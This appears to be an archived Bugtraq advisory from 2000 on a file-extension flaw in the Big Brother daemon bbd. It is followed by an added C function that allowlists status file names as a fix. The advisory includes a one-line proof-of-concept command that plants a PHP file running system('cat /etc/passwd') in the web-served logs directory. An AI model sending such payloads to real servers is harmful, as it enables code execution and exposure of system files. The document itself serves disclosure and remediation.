[15749] in bugtraq


Big Brother filename extension vulnerability

daemon@ATHENA.MIT.EDU (xternal)
Wed Jul 12 14:48:23 2000

MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-ID:  <20000711231139.6331.qmail@web2001.mail.yahoo.com>
Date:         Tue, 11 Jul 2000 16:11:39 -0700
Reply-To: xternal <xternal1@YAHOO.COM>
From: xternal <xternal1@YAHOO.COM>
To: BUGTRAQ@SECURITYFOCUS.COM

versions affected: bb14h2 (current) and older


exploit:
	bbd listens for incoming connections on port 1984.
Using telnet or the bb client, it is possible to
connect and create a filename with an arbitrary
extension, as the extension is not rigorously checked.
 As this file is dropped into a directory accessible
via the web server, any file extension that is parsed
server side can be abused.  For example:

./bb 1.2.3.4 "status evil.php3 <?<system(\"cat
/etc/passwd\");?>"

will allow viewing of the /etc/passwd upon browsing to
http://1.2.3.4/bb/logs/evil.php3.
	

solutions:
	-Modify bbd.c to only allow specified file
extensions (.disk, .proc ...)

	-Implement access restrictions via
$BBHOME/etc/security to minimize exposure to
vulnerabilities.  Unfortunately, the default install
doesn't enable the security file.


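The first solution in the post, sketched as an allowlist check on the "host.test" token of a status message. This is an added example, not code from bbd.c or from the original post; the function name `status_name_ok`, the host-part character set and the 255-byte limit are assumptions, and only `.disk` and `.proc` come from the post.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Allowlist of test extensions. "disk" and "proc" come from the post;
 * extend it with the tests your installation really reports. */
static const char *const allowed_ext[] = { "disk", "proc" };

/* Hypothetical helper: return 1 if `name` (the "host.test" token of a
 * status message) is safe to use as a file name in the web-visible
 * logs directory, else 0. */
int status_name_ok(const char *name)
{
    const char *dot;
    size_t i, host_len;

    if (name == NULL || strlen(name) > 255)
        return 0;
    dot = strrchr(name, '.');
    if (dot == NULL || dot == name)
        return 0;                       /* no extension or empty host */
    host_len = (size_t)(dot - name);

    /* Host part: letters, digits, '-', '_' and ',' only (assumed charset).
     * Rejecting '.' and '/' here blocks "evil.php3.disk" (some servers
     * honour every dot-separated extension) and path traversal. */
    for (i = 0; i < host_len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!isalnum(c) && c != '-' && c != '_' && c != ',')
            return 0;
    }
    /* Extension: exact, case-sensitive match against the allowlist. */
    for (i = 0; i < sizeof allowed_ext / sizeof allowed_ext[0]; i++)
        if (strcmp(dot + 1, allowed_ext[i]) == 0)
            return 1;
    return 0;
}

int main(void)
{
    /* Constructed sample names, not taken from a real bbd log. */
    const char *samples[] = { "www,example,com.disk", "evil.php3",
                              "evil.php3.disk", "../x.proc", "host.DISK" };
    size_t i;
    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-22s %s\n", samples[i],
               status_name_ok(samples[i]) ? "accept" : "reject");
    return 0;
}
```

The check belongs before bbd builds the output path, so a rejected name never reaches the file system.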
